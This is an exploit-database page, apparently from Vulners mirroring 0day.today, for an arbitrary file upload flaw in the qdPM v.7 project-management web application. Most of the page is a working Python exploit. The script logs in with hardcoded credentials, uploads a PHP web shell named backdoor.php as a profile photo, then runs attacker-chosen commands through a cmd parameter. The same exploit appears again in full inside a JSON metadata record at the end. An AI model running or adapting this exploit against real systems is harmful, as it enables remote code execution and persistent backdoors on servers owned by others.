Search...

qdPM v.7 Arbitrary File upload

2012-06-14T00:00:00

ID 1337DAY-ID-18622
Type zdt
Reporter loneferret
Modified 2012-06-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################################################################################
# Exploit qdPM  v.7 Arbitrary File upload
# Date: June 13th 2012
# Author: loneferret
# Version: 7
# Vendor Url: http://qdpm.net/
# Tested on: Winddows XP / XAMPP
######################################################################################
# Discovered by: loneferret
######################################################################################
 
# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.
 
# Vulnerability:
# Application does not verify the file's extension when uploading an image for a user's profile.
# Making it possible to upload a small php shell, and accessing it remotely.
 
# Note(s):
# One needs a valid user account to upload the file. (Client will do)
# No need to be authenticated to access the file.
 
# Uploading file:
# Once logged in, upload file here:
# Page: /qdPM/index.php/home/myAccount
 
# Access file:
# File can be found here:
# /qdPM/uploads/users/&lt;filename&gt;
#
# Note the filename will contain a random number. One need to
# to look at the source code from the browser to find it.
# For example: &lt;input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" /&gt;
 
 
 
----- python script -----
#!/usr/bin/python
 
import re, mechanize
import urllib, sys
 
print "\n[*] qdPM v.7  Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
 
print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py &lt;RHOST&gt; &lt;RCMD&gt;"
    exit(0)
 
rhost = sys.argv[1]
rcmd = sys.argv[2]
 
# Login into site
try:
        print "[*] Loging in ."
        br = mechanize.Browser()
        br.open("http://%s/qdPM/index.php/home/login" % rhost)
        assert br.viewing_html()
        br.select_form(name="UsersForm")
        br.select_form(nr=0)
        br.form['login[email]'] = "[email protected]"
        br.form['login[password]'] = "123456"
        print "[*] Hope this works"
        br.submit()
 
except:
        print "[*] Oups..."
        exit(0)
 
# Upload malicious file
try:
        print "[*] Uploading shell .."
        br.open("http://%s/qdPM/home/myAccount" % rhost)
        assert br.viewing_html()
        br.select_form(name="UsersAccountForm")
        br.select_form(nr=0)
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
        br.submit(nr=0)
 
except:
        print "[-] Upload didn't work."
        exit(0)
 
# Get file name once saved
try:
        br.select_form(name="UsersAccountForm")
        for form in br.forms():
                filename = form.controls[9].value
                print "[*] Filename is now: " + filename
 
        url = "http://%s/qdPM/uploads/users " % rhost
        url += "/%s?cmd=%s" % (filename,rcmd)
        print "[*] Executing command:\n"
        resp = urllib.urlopen(url)
        print resp.read()
 
except:
        print "[-] Oups..."
        exit(0)



#  0day.today [2018-01-09]  #

JSON Vulners Source

Initial Source

{"published": "2012-06-14T00:00:00", "id": "1337DAY-ID-18622", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-01-09T23:10:22", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-09T23:10:22", "rev": 2}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-01-09T23:10:22", "edition": 2, "title": "qdPM v.7 Arbitrary File upload", "href": "https://0day.today/exploit/description/18622", "modified": "2012-06-14T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/18622", "references": [], "reporter": "loneferret", "sourceData": "######################################################################################\r\n# Exploit qdPM v.7 Arbitrary File upload\r\n# Date: June 13th 2012\r\n# Author: loneferret\r\n# Version: 7\r\n# Vendor Url: http://qdpm.net/\r\n# Tested on: Winddows XP / XAMPP\r\n######################################################################################\r\n# Discovered by: loneferret\r\n######################################################################################\r\n \r\n# Software description:\r\n# Free project management tool for small team\r\n# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.\r\n# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact\r\n# using a Ticket System that is integrated into Task management.\r\n \r\n# Vulnerability:\r\n# Application does not verify the file's extension when uploading an image for a user's profile.\r\n# Making it possible to upload a small php shell, and accessing it remotely.\r\n \r\n# Note(s):\r\n# One needs a valid user account to upload the file. (Client will do)\r\n# No need to be authenticated to access the file.\r\n \r\n# Uploading file:\r\n# Once logged in, upload file here:\r\n# Page: /qdPM/index.php/home/myAccount\r\n \r\n# Access file:\r\n# File can be found here:\r\n# /qdPM/uploads/users/<filename>\r\n#\r\n# Note the filename will contain a random number. One need to\r\n# to look at the source code from the browser to find it.\r\n# For example: <input type=\"file\" name=\"users[photo]\" value=\"171793-backdoor.php\" id=\"users_photo\" />\r\n \r\n \r\n \r\n----- python script -----\r\n#!/usr/bin/python\r\n \r\nimport re, mechanize\r\nimport urllib, sys\r\n \r\nprint \"\\n[*] qdPM v.7 Remote Code Execution\"\r\nprint \"[*] Vulnerability discovered by loneferret\"\r\n \r\nprint \"[*] Offensive Security - http://www.offensive-security.com\\n\"\r\nif (len(sys.argv) != 3):\r\n print \"[*] Usage: poc.py <RHOST> <RCMD>\"\r\n exit(0)\r\n \r\nrhost = sys.argv[1]\r\nrcmd = sys.argv[2]\r\n \r\n# Login into site\r\ntry:\r\n print \"[*] Loging in .\"\r\n br = mechanize.Browser()\r\n br.open(\"http://%s/qdPM/index.php/home/login\" % rhost)\r\n assert br.viewing_html()\r\n br.select_form(name=\"UsersForm\")\r\n br.select_form(nr=0)\r\n br.form['login[email]'] = \"[email\u00a0protected]\"\r\n br.form['login[password]'] = \"123456\"\r\n print \"[*] Hope this works\"\r\n br.submit()\r\n \r\nexcept:\r\n print \"[*] Oups...\"\r\n exit(0)\r\n \r\n# Upload malicious file\r\ntry:\r\n print \"[*] Uploading shell ..\"\r\n br.open(\"http://%s/qdPM/home/myAccount\" % rhost)\r\n assert br.viewing_html()\r\n br.select_form(name=\"UsersAccountForm\")\r\n br.select_form(nr=0)\r\n br.form.add_file(open('backdoor.php'), \"text/plain\", \"backdoor.php\", name=\"users[photo]\")\r\n br.submit(nr=0)\r\n \r\nexcept:\r\n print \"[-] Upload didn't work.\"\r\n exit(0)\r\n \r\n# Get file name once saved\r\ntry:\r\n br.select_form(name=\"UsersAccountForm\")\r\n for form in br.forms():\r\n filename = form.controls[9].value\r\n print \"[*] Filename is now: \" + filename\r\n \r\n url = \"http://%s/qdPM/uploads/users \" % rhost\r\n url += \"/%s?cmd=%s\" % (filename,rcmd)\r\n print \"[*] Executing command:\\n\"\r\n resp = urllib.urlopen(url)\r\n print resp.read()\r\n \r\nexcept:\r\n print \"[-] Oups...\"\r\n exit(0)\r\n\r\n\n\n# 0day.today [2018-01-09] #", "immutableFields": []}